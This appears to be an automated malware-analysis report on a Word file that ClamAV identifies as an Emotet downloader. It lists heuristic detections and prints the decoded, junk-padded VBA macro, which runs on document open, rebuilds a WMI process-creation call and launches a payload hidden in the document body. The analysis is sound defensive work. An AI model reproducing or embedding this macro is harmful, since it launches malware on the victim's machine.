MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Trtf5nb4xxpitfu9sg = CreateObject(Nzb4r_zeqj9q1i) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7512 bytes |
SHA-256: f080f423f3af32bf8c04d24f919af2345f2f15905193e2101e5f7b51599e8466 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
77 of 134 identifiers look randomly generated (e.g. 'Trtf5nb4xxpitfu9sg') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Rw_gu6fr25wcs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
S592_m87mbgfjud7
End Sub
Attribute VB_Name = "Rkhqpdwb_l8se"
Attribute VB_Name = "Qsfjcxgtaymuqu25a"
Function S592_m87mbgfjud7()
On Error Resume Next
Pbhz_o5fkfkt = R3e1bbjchnw0f
dsfe = Fm5nbzei0o9farh + Rw_gu6fr25wcs.StoryRanges(wdMainTextStory) + O5197gw93dzfn
GoTo PvkOCY
Set MyBOZB = OFJpWCLE
Dim uyvFIBG As Double
uyvFIBG = Fix(PvkOCY)
If uyvFIBG <> PvkOCY Then Exit Function
Dim bzPNAC As Double
bzPNAC = uyvFIBG ^ (1 / 3)
If Fix(bzPNAC) ^ 3 = uyvFIBG Then
jmnlSF = True
ElseIf (Fix(bzPNAC) + 1) ^ 3 = uyvFIBG Then
jmnlSF = True
End If
PvkOCY:
g42 = "w]xm[vpw]xm[v"
Ncrmfnnaavobw5uq = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
GoTo aCfyHqBJU
Set esyZCOZCE = GsAAHCUR
Dim EBCVDHtDE As Double
EBCVDHtDE = Fix(aCfyHqBJU)
If EBCVDHtDE <> aCfyHqBJU Then Exit Function
Dim PpZkBECGq As Double
PpZkBECGq = EBCVDHtDE ^ (1 / 3)
If Fix(PpZkBECGq) ^ 3 = EBCVDHtDE Then
DFtrV = True
ElseIf (Fix(PpZkBECGq) + 1) ^ 3 = EBCVDHtDE Then
DFtrV = True
End If
aCfyHqBJU:
Lngd_p0zc8fkccwqsn = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
GoTo gPnGIBLJF
Set zjpmoDH = amqiA
Dim NmquxG As Double
NmquxG = Fix(gPnGIBLJF)
If NmquxG <> gPnGIBLJF Then Exit Function
Dim trdCBeG As Double
trdCBeG = NmquxG ^ (1 / 3)
If Fix(trdCBeG) ^ 3 = NmquxG Then
IFqfJBoIs = True
ElseIf (Fix(trdCBeG) + 1) ^ 3 = NmquxG Then
IFqfJBoIs = True
End If
gPnGIBLJF:
Srnoiqwpt7ynyn0k4a = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
GoTo raRrIaIIC
Set TIsEDDJr = yqjoECAzA
Dim ktiDB As Double
ktiDB = Fix(raRrIaIIC)
If ktiDB <> raRrIaIIC Then Exit Function
Dim pOxLF As Double
pOxLF = ktiDB ^ (1 / 3)
If Fix(pOxLF) ^ 3 = ktiDB Then
BAvxGHFhl = True
ElseIf (Fix(pOxLF) + 1) ^ 3 = ktiDB Then
BAvxGHFhl = True
End If
raRrIaIIC:
V2ult24fkwwep1k = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"
GoTo ncxWEs
Set WcKzVnHB = uZbUBJsJ
Dim WUEiDGCz As Double
WUEiDGCz = Fix(ncxWEs)
If WUEiDGCz <> ncxWEs Then Exit Function
Dim ELmIwJFCH As Double
ELmIwJFCH = WUEiDGCz ^ (1 / 3)
If Fix(ELmIwJFCH) ^ 3 = WUEiDGCz Then
BglyrFm = True
ElseIf (Fix(ELmIwJFCH) + 1) ^ 3 = WUEiDGCz Then
BglyrFm = True
End If
ncxWEs:
Qiu2fizkf7p = Srnoiqwpt7ynyn0k4a + V2ult24fkwwep1k + Lngd_p0zc8fkccwqsn + g42 + Ncrmfnnaavobw5uq
GoTo xNgLBVADL
Set vUMRG = cQvdhIGDJ
Dim FDYIADJ As Double
FDYIADJ = Fix(xNgLBVADL)
If FDYIADJ <> xNgLBVADL Then Exit Function
Dim omDVzktg As Double
omDVzktg = FDYIADJ ^ (1 / 3)
If Fix(omDVzktg) ^ 3 = FDYIADJ Then
GCxeCFDEN = True
ElseIf (Fix(omDVzktg) + 1) ^ 3 = FDYIADJ Then
GCxeCFDEN = True
End If
xNgLBVADL:
Nzb4r_zeqj9q1i = X0t5ado8nk6ef4rpj(Qiu2fizkf7p)
GoTo CNgSGHHJ
Set bESDIV = XJRoA
Dim VkPjEos As Double
VkPjEos = Fix(CNgSGHHJ)
If VkPjEos <> CNgSGHHJ Then Exit Function
Dim lsNlHnLW As Double
lsNlHnLW = VkPjEos ^ (1 / 3)
If Fix(lsNlHnLW) ^ 3 = VkPjEos Then
sZSixHX = True
ElseIf (Fix(lsNlHnLW) + 1) ^ 3 = VkPjEos Then
sZSixHX = True
End If
CNgSGHHJ:
Set Trtf5nb4xxpitfu9sg = CreateObject(Nzb4r_zeqj9q1i)
GoTo ucgNHFCDT
Set DjeFGgFHF = jiTpFB
Dim yzrRYACG As Double
yzrRYACG = Fix(ucgNHFCDT)
If yzrRYACG <> ucgNHFCDT Then Exit Function
Dim KBSNEEWB As Double
KBSNEEWB = yzrRYACG ^ (1 / 3)
If Fix(KBSNEEWB) ^ 3 = yzrRYACG Then
RvbuZbA = True
ElseIf (Fix(KBSNEEWB) + 1) ^ 3 = yzrRYACG Then
RvbuZbA = True
End If
ucgNHFCDT:
GoTo BidaeP
Set FhUxz = DaugHW
Dim jeLiOuI As Double
jeLiOuI = Fix(BidaeP)
If jeLiOuI <> BidaeP Then Exit Function
Dim hdlPOQo As Double
hdlPOQo = jeLiOuI ^ (1 / 3)
If Fix(hdlPOQo) ^ 3 = jeLiOuI Then
GkAdBBs = True
ElseIf (Fix(hdlPOQo) + 1) ^ 3 = jeLiOuI Then
GkAdBBs = True
End If
BidaeP:
GoTo kqmdaEFJA
Set qbuhElFE = LSQPB
Dim JUYFDGIC As Double
JUYFDGIC = Fix(kqmdaEFJA)
If JUYFDGIC <> kqmdaEFJA Then Exit Function
Dim WzqUbBK As Double
WzqUbBK = JUYFDGIC ^ (1 / 3)
If Fix(WzqUbBK) ^ 3 = JUYFDGIC Then
BsSGTDT = True
ElseIf (Fix(WzqUbBK) + 1) ^ 3 = JUYFDGIC Then
BsSGTDT = True
End If
kqmdaEFJA:
Trtf5nb4xxpitfu9sg.Create X0t5ado8nk6ef4rpj(Mid(dsfe, (1 + 4), Len(dsfe))), P166w5r3i5jp4238, If6j690451vbbks
GoTo IignOANIj
Set HwbMfICB = PWARIFZ
Dim ABxuBHE As Double
ABxuBHE = Fix(IignOANIj)
If ABxuBHE <> IignOANIj Then Exit Function
Dim eKUCGZBg As Double
eKUCGZBg = ABxuBHE ^ (1 / 3)
If Fix(eKUCGZBg) ^ 3 = ABxuBHE Then
VgsXETK = True
ElseIf (Fix(eKUCGZBg) + 1) ^ 3 = ABxuBHE Then
VgsXETK = True
End If
IignOANIj:
GoTo XVDamX
Set GnYebI = ZgCQIBIFC
Dim VvEuYFHh As Double
VvEuYFHh = Fix(XVDamX)
If VvEuYFHh <> XVDamX Then Exit Function
Dim EJRjID As Double
EJRjID = VvEuYFHh ^ (1 / 3)
If Fix(EJRjID) ^ 3 = VvEuYFHh Then
arMEDBF = True
ElseIf (Fix(EJRjID) + 1) ^ 3 = VvEuYFHh Then
arMEDBF = True
End If
XVDamX:
End Function
Function X0t5ado8nk6ef4rpj(X8wwk8r7jfbpm)
On Error Resume Next
GoTo WZUdHBZaH
Set jHRcHAFB = TABDzCADB
Dim QBOZDbEJ As Double
QBOZDbEJ = Fix(WZUdHBZaH)
If QBOZDbEJ <> WZUdHBZaH Then Exit Function
Dim boFfGxGS As Double
boFfGxGS = QBOZDbEJ ^ (1 / 3)
If Fix(boFfGxGS) ^ 3 = QBOZDbEJ Then
WZWqJADCg = True
ElseIf (Fix(boFfGxGS) + 1) ^ 3 = QBOZDbEJ Then
WZWqJADCg = True
End If
WZUdHBZaH:
Blgk4qx76heo836i = X8wwk8r7jfbpm
GoTo dudVBay
Set wsDmDIMZ = uCYttI
Dim ZlXYCaCe As Double
ZlXYCaCe = Fix(dudVBay)
If ZlXYCaCe <> dudVBay Then Exit Function
Dim dwpXOCmJA As Double
dwpXOCmJA = ZlXYCaCe ^ (1 / 3)
If Fix(dwpXOCmJA) ^ 3 = ZlXYCaCe Then
IcWfHD = True
ElseIf (Fix(dwpXOCmJA) + 1) ^ 3 = ZlXYCaCe Then
IcWfHD = True
End If
dudVBay:
Qzkzhgncxvuxkrrey = Z2il953431_z(Blgk4qx76heo836i)
GoTo HBJsCEQtW
Set NGgXFBSG = mLinF
Dim ezvjBtD As Double
ezvjBtD = Fix(HBJsCEQtW)
If ezvjBtD <> HBJsCEQtW Then Exit Function
Dim fflFJHn As Double
fflFJHn = ezvjBtD ^ (1 / 3)
If Fix(fflFJHn) ^ 3 = ezvjBtD Then
VjLOAB = True
ElseIf (Fix(fflFJHn) + 1) ^ 3 = ezvjBtD Then
VjLOAB = True
End If
HBJsCEQtW:
X0t5ado8nk6ef4rpj = Qzkzhgncxvuxkrrey
GoTo rVQcIIGFQ
Set KxZkUACAE = AXSdBFkCd
Dim NzXjJDCMB As Double
NzXjJDCMB = Fix(rVQcIIGFQ)
If NzXjJDCMB <> rVQcIIGFQ Then Exit Function
Dim NjaBJBCD As Double
NjaBJBCD = NzXjJDCMB ^ (1 / 3)
If Fix(NjaBJBCD) ^ 3 = NzXjJDCMB Then
nbMPli = True
ElseIf (Fix(NjaBJBCD) + 1) ^ 3 = NzXjJDCMB Then
nbMPli = True
End If
rVQcIIGFQ:
End Function
Function Z2il953431_z(Cslyrrtx2vmz7w6edz)
Z2il953431_z = Replace(Cslyrrtx2vmz7w6edz, "w]xm[v", Al9mjvbhj96z0o13bf)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.